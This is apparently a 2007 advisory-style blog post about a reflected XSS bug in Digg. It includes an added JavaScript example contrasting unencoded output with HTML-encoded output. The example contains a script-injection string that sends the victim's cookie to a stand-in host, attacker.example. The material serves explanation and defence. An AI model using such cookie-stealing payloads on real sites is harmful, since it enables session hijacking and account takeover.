Just another summer XSS in

Written by DP

Wednesday, 4 July 2007

Just another XSS vulnerability affecting Digg. Zuppergazi, a very active author, discovered it and notified us. Although we could not reproduce the previous XSS in Digg (it was promptly fixed), this time we were able to mirror it. We want to believe that the author has already contacted Digg's staff to let them know about the issue; we also contacted Digg ourselves, to make sure the associated risk is kept as low as possible.

At the time of writing, this XSS works in the latest version of Internet Explorer; most probably it does not work in Firefox.

Input from is not properly validated.

As with most XSS, it can be exploited by malicious users to hijack user sessions and thus compromise accounts, to "digg bomb" stories, and to perform cross-site request forgery (CSRF) with the victim's privileges.
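To make the bug class concrete, here is an added example written for this page; it is not Digg's code and does not reproduce the reported vector. It is a constructed search-results template that reflects a query parameter (assumed here to be named q) into HTML, first without validation or encoding and then with output encoding applied. The attacker string, the parameter name and the page layout are all assumptions made for illustration.

```javascript
// Added illustration of the bug class named in the advisory: untrusted input
// reflected into HTML without encoding. Everything here is constructed for the
// example; the parameter name "q", the template and the attacker string are
// assumptions, not Digg's code or the vector Zuppergazi reported.

// Minimal HTML entity encoder for text and double-quoted attribute contexts.
// Escaping all five characters is what lets one function serve both contexts.
function htmlEncode(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// 'Before': the search term is concatenated straight into the markup, so the
// attacker's string becomes part of the document's structure.
function renderResultsVulnerable(q) {
  return '<h2>Results for: ' + q + '</h2>\n' +
         '<input type="text" name="q" value="' + q + '">';
}

// 'After': every reflection of the untrusted value goes through the encoder.
// Note that validation alone (say, a length limit) would not be enough; the
// fix is encoding at the point of output.
function renderResultsSafe(q) {
  const enc = htmlEncode(q);
  return '<h2>Results for: ' + enc + '</h2>\n' +
         '<input type="text" name="q" value="' + enc + '">';
}

// Constructed attacker input: breaks out of the value="" attribute, then
// injects a script that ships the victim's cookie off-site, which is the usual
// first step towards the account compromise the advisory mentions.
const ATTACK = '"><script>new Image().src="http://attacker.example/?c="+document.cookie</script>';

// Crude structural check: does the rendered markup contain a live <script>
// element, as opposed to the same characters as escaped text?
function hasScriptElement(html) {
  return /<script\b[^>]*>/i.test(html);
}

// Stand-alone demonstration.
console.log('vulnerable:', hasScriptElement(renderResultsVulnerable(ATTACK)));
console.log('hardened:  ', hasScriptElement(renderResultsSafe(ATTACK)));
```

Because the injected script runs in the vulnerable site's own origin, it can also issue requests that carry the victim's cookies and read any anti-CSRF token present in the page, which is why an XSS of this kind defeats CSRF protections and allows actions such as "digg bombing" on the victim's behalf.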

It is almost certain that this XSS is not the last one. Digg has suffered from XSS vulnerabilities in the past, but fixed them all quickly: - March 2007
